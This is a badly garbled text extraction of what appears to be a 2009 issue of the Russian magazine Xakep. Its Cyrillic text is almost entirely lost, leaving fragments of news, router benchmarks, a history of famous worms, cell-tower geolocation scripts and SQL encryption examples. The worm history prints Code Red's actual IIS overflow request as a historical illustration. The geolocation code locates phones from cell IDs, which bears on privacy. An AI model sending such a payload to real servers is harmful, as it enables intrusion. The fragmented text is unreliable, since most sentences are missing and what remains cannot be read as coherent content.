Вы находитесь на странице: 1из 132

WORDPRESS

. 52

x 04()2009

w w w.xakep.ru
Code red

04 (124) 2009

PC27


WWW.GAMER-CITY.RU
. 4

Loveletter

10 / 1999-2009

Nimda

Melissa

J3

Slammer


1999-2009

6
Sasser

Storm

. 20

8
Warezov
PC27 adaptor
7
Mebroot
10
Sony rootkit

GPS
124

. 26


!



. 32


TWITTER

PYTHONE
. 88

Intro

Intro

Intro
Intro

Intro

Intro

1999 , ,
.
,

.
Downadup,
Windows-.
.
, -



10 .
nikitoz, . .
P.S. -
Gameland .
4.

CONTENT
04(124)
004 MEGANEWS

FERRUM

016

N Wi-Fi

Nimda

080
084

PC_ZONE

026
030
032

088


10

094

042
048
052

058
064
070

EASY HACK

WORDPRESS:


CISCO

102

110
115

The Pirate Bay


Win2k8:

FreeBSD Jail

120

127

-
BITTORRENT

IP-PBX Asterisk

124

072

SYN/ACK

106


Apple iPhone

IPHONE
-TOOLS

Twitter Pythone

098

038


Python CorePy


IP, GSM/UMTS Wi-Fi

10 -
GPS

,
UNIX-
Linux

Draft N Wi-Fi

020

128

(2009, VHSRIP)
][-

FAQ UNITED

FAQ

8,5

WWW2

web-

Mebroot

1C

020

CRYPTO

026

048

BID

032

Secunia

088

OSVDB

ISS X-Force

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)

Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

(komarov@gameland.ru)
>

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
>

/XAKEP.RU

>

(xa@real.xakep.ru)

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.
ru)
>





>

>
( )
(strekneva@gameland.ru)
>

>


> -
(alekseeva@gameland.ru)

/PUBLISHING

>

(noah@gameland.ru)
>

>

(dmitri@gameland.ru)
>

(shostak@gameland.ru)
>

(romanovski@gameland.ru)
>

(stepanovm@gameland.ru)
>

(leonova@gameland.ru)
>

(ladyzhenskiy@gameland.ru)
>PR-

(litvinovskaya@gameland.ru)

>


(andrey@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24

>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.


.
.
Gameland

, ,
Gameland TV.
,

content@gameland.ru.

>> meganews
J3

PC27

PC27

J3

MIFRILL / MIFRILL@R EAL.XAKEP.RU /


Samsung
Samsung
. 50 20, 21,5 23.
: 2
, , 5 ;
50.000:1; 300 /2.
: 1200900
19201080 . MagicBright3,
, :
, , , , ,
.
, ,

. - , 50 .
-,
.


(game)land

! 25 26


,
,

.
www.gamer-city.ru! !

. Xbox 360,

,
-, . ,
, .
,

004

APPLE, IPHONE
OS

30

.


. !
-
:


:
., . 153 , -153
. 2,
.2,
.7,

., .13,

F.E.A.R. 2: Project Origin(PC)


Call of Duty: World at War(PC)
GRID (PC)
Gears of War 2 (Xbox 360)
Mortal Kombat vs. DC Universe (Xbox 360)

www.gameland.ru
FAQ.
X 04 /124/ 09

>> meganews
PC27

PC27


. , , , , .
76.000 , ( ). , ,
, ,
, , .
,

,
. .
, , ,
, .
, ?..

e-ink
, ,
. ( ,
E-ink, ) FLEPia
Fujitsu Frontech Limited Fujitsu Laboratories Limited.
8" 7681024
260.000 .
8
, .
4096 5 ,
64 - 1.8 .
:
Windows CE5.0 , , Wi-Fi IEEE802.11b/g Bluetooth
Ver2.0+EDR, USB, SD- 4 .
, ,
2400 64- (
7000-9000 ).
$1015, .
, , .
FLEPia, :).

HP
,

,

006


HP.
- ,

.
, ,
,
,

DVD- CD-

.


, ,

5%.

,

.
HP
,
,
.

X 04 /124/ 09

>> meganews
PC27

Gmail
,
e-mail,
? ,

-
... , ,
Send (
!). , ,
, .
, -

J3

Google .
Gmail
undo sent,
.


.
5 ,
.
,
, 5-
, , .

JIWIRE,

WI-FI .

, !

, , ,
.
Amazon.com
(,
, ).
,
. ,

,

, -,
- .

,

. Bristol
Bookbarn ,
.
,
, (

150 ). ,
,
.
Amazon.
com ,
-
.

IE 8.
Microsoft, -,

Internet Explorer 8.
19 , 20- :). PWN2OWN,
3Com, .
Nils,
IE7,

Windows 7
IE8
.

. Nils -

008

5000
Sony Vaio,
Microsoft
Security Research Center.
,
, IE8
.

(
Google Chrom), InPrivate

SmartScreen.
X 04 /124/ 09

>> meganews

sci-fi
,

. , ,
,
, .

,
.
,
,
, ,
.


,


,
.
,
,
,
, ,

TED. ,
,
,
, .
,

.

PC27

,

CeBIT 2009 Gigabyte Technology
,
Touch Note M1028 Booktop M1022. 10.1
, ,
. , , 1024x600 1366x768
. , Wi-Fi,
Bluetooth Express Card.
. Booktop M1022 -,
.
, 10.1
, 3.5G,
HSDPA .


,


( !). ,
Ghost in the shell ,
-
.

, .

010

,
2 . ,

,

USB-.
,
2.0 .
X 04 /124/ 09

>> meganews
PC27

PANDA SECURITY :

10 .

,
.

IBM + SUN = ?
The Wall Street Journal.
, , IBM
Sun Microsystems,
. , ,
, 6.5 . . ,
IBM
, , .

,
Windows


Phillips, OLED-.
Phillips
(OLED),

,
,
.
OLED ,

.
, ,
,

.
,
, .

012


, CeBIT 2009 . Asus
Asus-Lamborghini VX5,
Asus
Lamborghini Reventon. ,
.
Core2 Quad, 4
SSD- 1 . -, , Vx5 ,
.
16 Full-HD,
NVIDIA GeForce GT 130M 1 GDDR3 VRAM,
- Blu-ray.
, ,
TwinTurbo, ,
. ,
.

SECUNIA, FIREFOX

115 , 4

, .

X 04 /124/ 09

>> meganews

, -, ,
Blu-ray ,
. , , , , 100 . . , , , Blu-ray -
.
DVD-, .avi. , Blu-ray
, .
1000 , , Blu-ray 1500 . ,
100 1 .

83%
.

, , .
.
, ,

,
, ,
.
Virtual Cocoon
.
.
( )
. , ;
HD-, 30
. , , , . ,
5 . ,
- , 1.500 .
X 04 /124/ 09

013

>> meganews
PC27



Microsoft.
,
,
The Business Insider,
Microsoft
Office 14 .


.

, ,
.
,

Office 14,
.
2010 ,

.
,
Microsoft
.


LiveJournal
. ,

- Microsoft Hotmail,
. Hotmail

, LJ, e-mail ,
, ,
,
.
,
. ,
,

.

iPod Suffle
Apple
-
iPhone OS 3.0,
, iPod suffle 4 .

. iPod

,
, ,


.
iPod shuffle
,

. -


, ,
,
.
, ,
, iPod shuffle
.
iPhone . ,
,


Apple
Made for iPod,

suffle.
,


,

.
Apple ,
iPod shuffle 14
( ).

VoiceOver ,
, .

, . ,
,
$79.






,

, .
, ,

,
,
,
.
, Sophos

,
.

014


,
, .
,
, ,

Diebold .
,
,

.

, Diebold Agilis.
?
X 04 /124/ 09

>> meganews
Eee

CeBIT

Eee Asus.
Eee Keyboard
PC,
CeBIT-PreView
Awards,

5 .
Keyboard PC

,
-
! Eee PC
T91
,

8.9. 0.96
5 ,
802.11b/g/n,
Bluetooth 3G plus, GPS
-.
Eee Eee
Top ET1602,

; Eee Box PC B206



HD;
Skype- Eee Videophone;
Eee Stick .
.

47%
ADFUSION
,
E-MAIL,
.

X 03 /123/ 09

015

>> ferrum

Draft N Wi-Fi
N

Draft N .

.
.

, WiFi-
.
, ,
. ,
TRENDnet .

WAN-. ,
,
PPTP/L2TP PPPoE.

, TCP/IP.

VPN-.
VPN-
. ,
.

016


:
1. NAT (

Static IP Dynamic IP WAN-).
, NAT
: WANLAN (
download), LANWAN (
upload) FDX (
).
2. PPTP.
- .
WAN- VPN-,
CPU , .
(PPPoE, PPTP L2TP) PPTP
; ,
.

3. Wi-Fi ASUS WL-100N, D-Link DWA645, TRENDnet TEW-624UB.


.
1 /.
WiFi-.

.

. ,
,
,
10 .
WPA-PSK-TKIP.

X 04 /124/ 09

>> ferrum
PPTP


:
ASUS WL-500W 1.9.8.2
ASUS RT-N15 1.0.1.7
D-Link DIR-615 2.25 B09
D-Link DIR-655 1.12 B04
NETGEAR WNDR3300 1.0.26
TRENDnet TEW-632BRP 1.10 B08
TRENDnet TEW-633GR 1.0.30

TRENDnet TEW-633GR

fdx
I w
wI

TRENDnet TEW-632BRP
D-Link DIR-655
D-Link DIR-615
ASUS WL-500W
ASUS RT-N15
0

000

20
40
/

60

80

100

120

D-Link DIR-655 TRENDnet TEW-633GR


5700 .
5500 .

ASUS RT-N15
:
: 1xWAN (RJ-45) 10/100/1000 /, 4xLAN (RJ-45)
10/100/1000 /
Wi-Fi: IEEE 802.11 b/g + Draft N ( 300
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES/TKIP+AES), WPS
: NAT/NAPT, DynDNS, Static Routing, DHCP
: SPI, Packet Filter, URL Filter, MAC Filter
: WAN Bridging

ASUS Draft N ,
, . RT-N15
ASUS.
, . WAN-
, ( NAS ). WAN-Bridging,
, IPTV .
, WAN-
. , CPU
, IGMP-proxy.
WPS,
Wi-Fi .

PPTP, ASUS RT-N15 ,


(ASUS WL-500W) 20 /.
X 04 /124/ 09

ASUS WL-500W
:
: 1xWAN (RJ-45) 10/100 /, 4xLAN (RJ-45) 10/100
/
Wi-Fi: IEEE 802.11 b/g + Draft N ( 270
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES/TKIP+AES)
: NAT/NAPT, DynDNS, Static Routing, DHCP
: SPI, Packet Filter, URL Filter, MAC Filter
: 2 USB 2.0 USB-,
..

ASUS WL-500W, Draft N .


ASUS WL-500GP.

open-source Linux, .
(
WAN-). WL-500W Draft N .
ASUS.
USB 2.0 , ,
web-.

. PPTP- , , 20 /. WL500W NAS ,


2 / , .

017

>> ferrum
WI-FI (10, )

WI-FI (1, )
TRENDnet TEW-633GR

ap-pc
fdx
pc-ap

TRENDnet TEW-632BRP

TRENDnet TEW-633GR

D-Link DIR-655

D-Link DIR-655

D-Link DIR-615

D-Link DIR-615

ASUS WL-500W

ASUS WL-500W
ASUS RT-N15

ASUS RT-N15
000

ap-pc
fdx
pc-ap

TRENDnet TEW-632BRP

20
40
/

60

80

100

120

000

10

20
30
/

40

50

60

70

80

Wi-Fi D-Link DIR655, TRENDnet TEW-633GR, ASUS

10 ASUS WL-500W,
D-Link TRENDnet

D-Link DIR-615

D-Link DIR-655

: 1xWAN (RJ-45) 10/100 /, 4xLAN (RJ-45) 10/100


/
Wi-Fi: IEEE 802.11 b/g + Draft N ( 300
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES/TKIP+AES), WPS
: NAT/NAPT, DynDNS, DHCP, Traffic Shaping
: SPI, Packet Filter, URL Filter, MAC Filter, Access
Control
: IPv6 Ready

: 1xWAN (RJ-45) 10/100/1000 /, 4xLAN (RJ-45)


10/100/1000 /
Wi-Fi: IEEE 802.11 b/g + Draft N ( 300
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES), WPS
: NAT/NAPT, DynDNS, DHCP, Static Routing, QoS Engine
: SPI, URL Filter, IP/MAC Filter, Access Control
:

2800 .

D-Link, Draft N .
IPv6. , IPv4 IPv6
, D-Link
! WAN- D-Link
DIR-615 . ,
(D-Link DIR-655), WAN-
VPN- .
IGMP Proxy, multicast
IPTV , .


L2TP- .

018

5100 .

,
. 1.12WW Build
04 WAN-. , D-Link DIR-655 . NAT
250 /, PPTP 90-100 /
. Wi-Fi .
90 /,
10 60 /. , IGMP-proxy, multicast- IPTV
.

PPTP .
L2TP-
.
X 04 /124/ 09

>> ferrum
WI-FI (1, )

WI-FI (10, )

TRENDnet TEW-633GR

ap-pc
fdx
pc-ap

TRENDnet TEW-632BRP

TRENDnet TEW-633GR

D-Link DIR-655

D-Link DIR-655

D-Link DIR-615

D-Link DIR-615

ASUS WL-500W

ASUS WL-500W

ASUS RT-N15
000

ap-pc
fdx
pc-ap

TRENDnet TEW-632BRP

ASUS RT-N15
0

0.2
0.4
/

0.6

0.8

1.2

1.4

D-Link
DIR-655 TRENDnet TEW-633GR,

2900 .

TRENDnet TEW-632BRP
:
: 1xWAN (RJ-45) 10/100 /, 4xLAN (RJ-45) 10/100
/
Wi-Fi: IEEE 802.11 b/g + Draft N ( 300
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES), WPS
: NAT/NAPT, DynDNS, DHCP, Static Routing
: SPI, Packet Filtering, Domain/URL Filtering, MAC
Filtering
: WPS

TRENDnet TEW-632BRP
, D-Link DIR-615. , TRENDnet ,
WAN-. ,
, .
NAT
(WANLAN LANWAN) 100 /. WPS ,
WiFi-. WPS PIN-
web- .

000

0.2
0.4
/

0.6

0.8

1.2

1.4

10
D-Link DIR-655 TRENDnet TEW-633GR

6000 .

TRENDnet TEW-633GR
:
: 1xWAN (RJ-45) 10/100/1000 /, 4xLAN (RJ-45)
10/100/1000 /
Wi-Fi: IEEE 802.11 b/g + Draft N ( 300
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES), WPS
: NAT/NAPT, DynDNS, DHCP, Static Routing, Traffic
Shaping
: SPI, Packet Filtering, Domain/URL Filtering, MAC
Filtering
: StreamEngine, WPS

TEW-633GR Draft N
TRENDnet. (
WAN-) ,
NAT ( 300 /). , 100 /.

NAS-. PPTP-
. TRENDnet TEW-633GR D-Link DIR-655. WPS, WiFi-
.

,
WAN-. TRENDnet
PPTP- 10 /.
-. , .

, .
, -
2000 , 3000.
X 04 /124/ 09

.
TRENDnet TEW-632BRP /
.
D-Link DIR-655, Wi-Fi Draft N
. z

019

>> pc_zone
3
Code red

Loveletter

/ STEP@GAMELAND. RU/

1
Melissa

J3

Slammer

6
Sasser

Nimda

9
Storm

Mebroot
8
Warezov

10

Sony rootkit

10
.
.
-, , .
10 .
020

X 04 /124/ 09

>> pc_zone

Melissa
Loveletter
MELISSA 100

1999


- ,
.
, , ,
Melissa.
26 alt.sex Usenet

.
List.DOC, 80
: , .
-:
, 50
.
, e-mail.

2000


, Love Letter ( Love
Bug). ,
ILOVEYOU , .
,
Visual Basic
Script, .

Melissa

Loveletter

The Subject: ILOVEYOU


Message body: kindly check the
attached LOVELETTER coming from me.
Attached file: LOVE-LETTER-FORYOU.TXT.vbs

,
.
, , ,

.
, .
X 04 /124/ 09

ILOVEYOU

Melissa MS Word 97/2000, ,



Outlook. Visual Basic
MS Windows
. MS Outlook, 50 email
.
,
,
, .
, ,
,
.
1999 , -


Windows Scripting Host,

MS
Outlook, ,
.

Internet Explorer. ,

.

. , WIN-BUGSFIX.EXE
Microsoftv25.exe
.

.
,
, .vbs. rulez.mp3,
rulez.mp3.vbs
.

- ,
.


, .

. 27
; 29

, ,
.
,

VB, 10 ,
, 20
$5000.
,
Melissa.

,
,
mIRC

IRC-. HTML-,
ActiveX-. , ,
: ,
, .
Love Letter 4 2000 .,

, NASA, , , ,
. ,
,
$5 . ?
: barok -loveletter(vbe)
< i hate go to school > by: spyder / ispyder@mail.
com / Manila,Philippines.
,
.

021

>> pc_zone
CODE RED

SLAMMER

Code Red
Slammer
2001

-
2002
IP- :). 13 2001 , Code Red IIS
. ,
, Microsoft
, . ,
13 6
350 .
ISS
. Code
Red
,
. Code
Red IIS -,
HTTP- IP- ,
- 80- IIS.
.

Code Red

2002


2001

, , .
,
. Nimda
,

.
.
1.
,
Internet Explore,
. README.EXE (,
, ++)
,
.

Nimda

022

, GET-,
.
Apache, , ,
IIS , :
GET /default.ida?NNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNN%u9090%u685
8%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%u9090%u6858%ucbd3%u7801%u9090%
u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0

Code Red
. :
,
TCP/IP-
.
.

,

,
MAPI-
Microsoft Exchange.
2. .
Nimda
, .EML .NWS. ,
,
.
3. IIS,

. Nimda
-
directory traversal. -
,

Code Red, .

: HELLO!
Welcome to http://www.worm.com! Hacked By
Chinese!,
,
. , , : ,
.
20 28
DoS-
IP-,
.
Code Red II, , ,

,
cmd.exe \inetpub\scripts\ ISS-. Code Red,


.

.
4. Nimda

, Code
Red II sadmind/IIS.
, Nimda
, .
Guest . ,
.
,
.
,
, ,
: Concept Virus(CV) V.5,
Copyright(C)2001 R.P.China

X 04 /124/ 09

>> pc_zone
Sasser

email

DESKTOP
COMPUTER

email c

WEB
SERVER

IIS
Code Red

DESKTOP
COMPUTER

IIS
Code Red

WEB
SERVER

DESKTOP
COMPUTER
OR FILE
SERVER

NIMDA

Nimda

SASSER

2003


, 25
.
,
.

Slammer.
12:30
, 12:33
8.5 .
Microsoft
SQL Server, David Litchfield BlackHat.
1434

,
, ,
.
, 75.000 - ,
? IIS,

,
UDP, ,
376 , UDP-. Slammer
TCP,
-, UDP
!
,
6 ,

, Slammer . ,

.


24 . :
27
. , , , SQL.

2004

-,
System Shutdown, NT AUTHORITY\SYSTEM

, Blaster,
2004,
Sasser.
, .
Sasser Local Security Authority
Subsystem Service (LSAS)
. ++ Sasser 128 , ,

IP-,
445
.
, ,
. Sasser 9997
,
.

FTP,
5554 .
, - , Sasser

,
.
Sasser -

,
, .
,
.
,

.
18- ,
.
- ,
Microsoft
250.000 . Sasser,
Netsky.

Slammer

Sasser

X 04 /124/ 09

023

>> pc_zone
Sony rootkit

BSOD - SONY ROOTKIT

Warezov

WAREZOV

2005
2006
2007

. ,
,
. $sys$aries
(aries.sys) , $sys$
API-. Win32/
Rootkit.XCP System
Service Table (SST)
: NtCreateFile, NtEnumerateKey,
NtOpenKey, NtQueryDirectoryFile,
NtQuerySystemInformation. , ,
.
: , , ? ,
-

, ? .
,

. :
,
, .
, -
,
-
, .
, Sony
,
.

2006 ,

-
,
. ?
Warezov ( Stration),
,
email.
, . :
.
Warezov
, ,
. ,
30
.

.
, - ,
IM-. Warezov
,
Skype!
, Warezov

.
URL- (, , ),
. -
,
. Warezov
,

.
SMTP-. , ,
. fast-flux ,

IP- . IP
,
. Warezov
: -, reverse HTTP proxy, () , DNS-,
Bind Windows
.

,
Storm,
. P2P-,
. IP- ( fast-flux
domains). .

. ?

19
2008 , ,

,

Full Clip.exe, Full Story.exe, Read
More.exe Video.exe.
,
,
,
. Storm ,

(
30-45 ),

. .
,
,
. ,
.
, Storm
: Win32.agent.
dh,

,
DDoS-.

:
,
! Win32/
Rootkit.XCP, sony rootkit,
-CD, Sony
BMG.
DRM-
(Digital Rights Management),
First 4 Internet, . ,

,
-

Sony rootkit

Warezov

Storm

024

X 04 /124/ 09

>> pc_zone
MEBROOT

FAST-FLUX


DOWNADUP

Merboot

COMPROMISED
PCs
,

NS.SUPERSAMEAS.COM

STORM BOTNET
211.51.164.123

Downadup

HOME
PC

QUERY:
WWW.SUPERSAMEAS.COM

3
HTTP GET:211.51.164.123

Storm

2008

,
, . 2005
Black Hat
eEye Digital Security ,

,
Windows
. , 2008
,

2009

,
, -: Downadup, Conficker, Kido. :

,
.
,
.
,

MS08-067
( ).

RPC,
wcscpy_s

Merboot

Downadup

X 04 /124/ 09

MS08-067

,

ADMIN$

, Mebroot.
2005
-
,
, .
:
.
MBR ( ),
- ,

netapi32.dll. -,

.
,
,

ADMIN$. : Autorun.inf
(
) . =
!
,
(
, DDoS ..).


MS08-067,

WINDOWS

Windows, .
, MBR
, ,
. ,
,
API- MBR.

,
Windows ,
.


-
.
250
, .


.
, .
API-, DNS,
,
, , kaspersky, nod, symantec,
microsoft .. z

025

>> pc_zone


/ STEP@GAMELAND. RU/

GPS
IP, GSM/UMTS Wi-Fi
, GPS, .
,
, . ,

.
, GPS , ,
? .

. ?
, :
1. IP
, , .
2.
GSM/UMTS. .
3.
Wi-Fi, .
, .

IP
IP, ,
, VPN ,
ip2location.com. , , IP-,
, (, ,
), . ,
-.
, ,
, IP. ,
, (, hotspot
),
, . ,
, . ,

026

, .
,
IP-, WiFi-,
.
,
ip2location.com, .
, ,
, .
IP- ,
ip2location
. ,
, : .cvs () .bin
().
. , IP-
, PHP-
IP- :
function Dot2LongIP ($IPaddr)
{
if ($IPaddr == "") {
return 0;
} else {
$ips = split ("\.", "$IPaddr");
return ($ips[3] + $ips[2] * 256 + $ips[1] * 256 * 256
+ $ips[0] * 256 * 256 * 256);
}
}

,
X 04 /124/ 09

>> pc_zone

ip2location

MNC, MCC, LAC, Cell ID


,
IP-? ! :)

.
BIN-, . Perl, C, Python, PHP, Ruby,
C#, VB.NET, Java, Visual Basic
(http://www.ip2location.com/developers.aspx), . PHP
IP2Location.inc.php :
<?php
include("IP2Location.inc.php");
$ip = IP2Location_open("samples/IP-COUNTRY-SAMPLE.BIN",
IP2LOCATION_STANDARD);
$record = IP2Location_get_all($ip, "_IP-_");
echo "$record->country_long : " . $record->country_long;
echo "$record->city : " . $record->city;
echo "$record->isp : " . $record->isp;
echo "$record->latitude : " . $record->latitude;
echo "$record->longitude : " . $record->longitude;
IP2Location_close($ip);
?>

,
Google Maps, :
http://maps.google.com/maps?f=l&hl=en&q='+query+'&near
='+str(lat)+','+str(lng)+'&ie=UTF8&z=12&om=1

!
,
,
. ,
Google Maps (www.google.com/gmm).
, -,
,
. ,
maps.google.com .
(
Opera Mini) , Google, , .
,
Java, Windows
Mobile Symbian S60 3rd Edition, BlackBerry,
Android, , . iPhone Google
Maps . ,
,
.
. , GPS :
! , X 04 /124/ 09

,
! , .
,
, . ,
. ,
.
CellID ( CID)
, . , , , ,
.
, , .
, ,
,
. Google Maps , .
?
, .
, , ( , ,
). , ,
, :).
, , ,
. !
Google
Google Maps,
GPS. :
, (
) ,
. .

GSM-

,
Google ? , ,
,
? , !
Google Maps, API, , . http- , ,
http://www.google.com/
glm/mmap, ,
.

027

>> pc_zone

links

Google
Maps: mapki.com/
wiki/Google_Map_
Parameters.
GPS-

:
tinkerlog.com/2007/
07/13/interfacing-anavr-controller-to-agps-mobile-phone.


Yahoo:
developer.yahoo.
com/yrb/zonetag/
locatecell.html.


Google Maps.
PHP: http://www.
witracks.com.br/
gmaps.txt.
j2me: http://www.
mapnav.spb.ru/site/
e107_plugins/forum/
forum_viewtopic.
php?9736.
Python S60:
http://blog.jebu.
net/2008/07/googlecell-tower-mappingwith-python-on-s60.
C#: http://maps.
alphadex.de/datafiles/
fct0e1b11782832f02.
cs.
Delphi: http://
forum.netmonitor.ru/
about4470-0-asc-60.
html.

dvd

,


.

028

Google

NetMonitor Symbian

Wi-Fi:


: MCC, MNC, LAC CellID.
MCC ( 250)
MNC ( 01, 02,
99 ..)
LAC ( ,
,
)
CellID (CID) ,

, ,
!
Google Maps ,
,
myl:MCC:MNC:LAC:CellID.
netmonitor:
, ( ),
.
,
.
, ,
.
Python,
Skvo forum.netmonitor.ru:
net, cid, lac = 25002, 9164, 4000
import urllib
a = 000E00000000000000000000000000001B000000
0000000000000000030000
b = hex(cid)[2:].zfill(8) + hex(lac)[2:].
zfill(8)
c = hex(divmod(net,100)[1])[2:].zfill(8) +
hex(divmod(net,100)[0])[2:].zfill(8)
string = (a + b + c + FFFFFFFF00000000).
decode('hex')
try:
data = urllib.urlopen('http://www.google.
com/glm/mmap',string)
r = data.read().encode('hex')
if len(r) > 14:
print float(int(r[14:22],16))/1000000,
float(int(r[22:30],16))/1000000
else:

print 'no data in google'


except:
print connect error

, ,
Python ( 2- , 3-
), http://python.
org/download/releases. ,
, NET (MCC
MNC, ), CID, LAC.
http://www.google.com/
glm/mmap .
, , , 59.200274 39.836925.
: no data in google.
, , NET LAC
CID ( 1 65536), , ,
, .
,
GUI-, C# (
).
, Google
Maps.
. ,
,
LAC CellID. MCC/MNC
,
LAC, CellID.

,
. .
; ,
100
, !
, .
, , .
, Google,
Cell ID, LAC, NET :
http://mobile.maps.yandex.net/cellid_locati
on/?&cellid=%d&operatorid=%d&countrycode=%d
&lac=%d

,
XML-, .
X 04 /124/ 09

>> pc_zone

Google,


Google Maps,
, , . , , -
, ,
. , ,
:
. ,
. :
1. ;
2. , ;
3. NMEA,
GPS-, .
VirtualGPS (www.kamlex.com),
Windows Mobile 2003, WM
5, WM 6, WM 6.1. lite-
GPS.
,
, ,
, GPS-.


Google Maps

, - SKYHOOK
.
, Wi2Geo (wi2geo.ru),
- Wi2Go :). Windows Mobile, Symbian, Windows Mac OS
X, IP-,
GSM , , Wi-Fi. , API (http://labs.
wi2geo.ru/basicapi.php). ,
, Wi-Fi.
.

?
WI-FI
, WiFi-
, , , . , :). :
,
MAC- ( SSID)
.
.
, Wi-Fi ,
, , . WPS (Wi-Fi Positioning System) SKYHOOK Wireless (www.skyhookwireless.com),

. , , API-, . Firefox Geode (http://
labs.mozilla.com/geode_welcome),
- (
, ).

NetMonitor
,
, , . ,
,
!
Symbian: FieldTest, CellTrack, Best GSMNavigator
Windows Mobile 2005: GPS Cell
Windows Mobile 5.0/6.0: NetMonitor32, WMCellCatcher,
CellProfileSwitcher (,
-)
X 04 /124/ 09

,
.
,
. , ,
. Google
Google Latitude, Google Maps. ,
,
?
. http://forum.xda-developers.com/
showthread.php?t=340667 , WM, -.
Google
Earth. ,
! z



.
, . celldb.org/aboutapi.
php, www.opencellid.org/api, http://gsmloc.org/code, cellid.telin.
nl. API
HTTP-,
MCC, MNC, Cell ID LAC.
Netmonitor.ru,
, ,
, 2 Skylink. ,
.

029

>> pc_zone
1) :
152

155

157

160 163

165

168

170

173 175

178 180

183

185

188 191


50-75 c.

178 c.

166 .

124 .

100 - 200

109 .

67 .

44 .

2)




.


/ VITYA31@MAIL.RU/


, .

>> pc_zone

18 ,
, ! .
, ? IT
,

.
,
,
Windows, .

030


,
, ,
,
. ,
.
,
,

. , ? Workrave (http://
www.workrave.org/welcome),
, !

.
, ,
. ,
, .
X 04 /124/ 09

>> pc_zone


. ,

(). 10-
( ).
.

, , . ,
.
, ,
, ,
.
.
: ,
,
. , ,
, . Workrave ! ,
.

.
: , :).
, ,

, : .
( ,
)
.


.
,
. ,
,
.
- Workspace
Planner (internalapps.ergotron.com/MirWebTool/
ergoTool_metric.html)
, .
1988 ,
. :
,
(, ,
?), .
:

,
.
X 04 /124/ 09

Workrave


, ,

.
, , ,
,
. , , , ? , !
,

.
, .
- . -: ,
- ,
.
f.lux (www.stereopsis.com/flux).

.
,
.
: !
, ,

( ).
, ,
. f.lux ,

: .
Google,

.
Windows, Linux Mac OS X.
.
40-50 .
,
. ,
,
, .
: EyesKeeper (www.
gi.ru/eyeskeeper) .
,
.
. , ,
-
, .
:). z

021

>> pc_zone


1C

CRYPTO

1C

CRYPTO

/ KOMAROV@ITDEFENCE.RU /

>> pc_zone

, . ,
, .
. , .
, .
. ,
,
. ?
,

032

.
,
.
,

. , . ,
, : ,
.
,

. 1,
X 04 /124/ 09

>> pc_zone

( ,
XOR ),
. ,
,
.
,
.
,

. ,

!

DES_ENCRYPT(),
MySQL .
, :
INSERT
INTO
t
VALUES
(1,AES_
ENCRYPT('text','password'));

, .
SQL- ,

. ,
AES_DECRYPT(AES_ENCRYPT())
unhex(hex()).

!
:

, ,
.
,

, ! , :). Spelabs
(spellabs.ru/spellabsCrypto1C.htm) -
,
1 ,
.
, ,
. , .
,
!
, , ,
,
.
MySQL
14 ,
:
AES_ENCRYPT() AES
AES_DECRYPT() AES
COMPRESS()

DES_ENCRYPT() DES
DES_DECRYPT() DES
ENCODE()

(
plaintext )
DECODE()
,
ENCODE()
ENCRYPT()

Unix crypt
MD5()
MD-5
SHA1(), SHA() SHA-1 (160)

SQL-, AES_ENCRYPT()
X 04 /124/ 09

T-SQL
,

(
), .

().
,
. ,

.
Microsoft
SQL Server,
.
T-SQL,
SQL.
,
.
EncryptByCert(),
. .
? .
, andrej Bank
:
USE Bank;
CREATE CERTIFICATE andrej
ENCRYPTION BY PASSWORD =
'pGFD4bb925DGvbd2439587y'
#

# FROM FILE = 'c:\Shipping\Certs\
Shipping11.cer'
# WITH PRIVATE KEY (FILE = 'c:\
Shipping\Certs\Shipping11.pvk',
WITH SUBJECT = 'Employers
Access',
EXPIRY_DATE = '10/31/2009';
GO

,
SQL-:
INSERT INTO [].[]
values( N' ',
EncryptByCert(Cert_ID('andrej'),
@cleartext) );
GO


@cleartext andrej.
.
,
( ,
).
: DecryptByCert().
,
. , , ,
(passphrase).
,

. , .
, .

:
SELECT
convert(nvarchar(max),
DecryptByCert(Cert_Id('andrej'),
ProtectedData,
N'pGFD4bb925DGvbd2439587y'))
FROM [].[]
WHERE Description
= NEmployers Access;
GO

[].[],
Employers Access.

Andrej pGFD4bb925DGvbd2439587y.

varbinary nvarchar.
, ,

.


, ,
.
,
, .

!
,
,

033

>> pc_zone

info


:
,

;


,

(
),


;




.
,




MSSQL 2008 ( Enterprise).

TDE (Transparant
Database Encryption).

. , ,
,

. ,
,

, .

.
SQL Shield (www.sql-shield.com).
/*sqlshield*/ WITH
ENCRYPTION ,
. ,
:

CREATE PROCEDURE MyTest


WITH /*sqlshield*/ ENCRYPTION
AS
SELECT 2+2

:
MyTest
> 4

, ,
.
SQL Server Syscomments Decryptor (www.
geocities.com/d0mn4r/dSQLSRVD.html),

. !


- .
, :

warning

SQL Server


ANSI_PADDING
OFF
-
!

034

ID
354
643
411

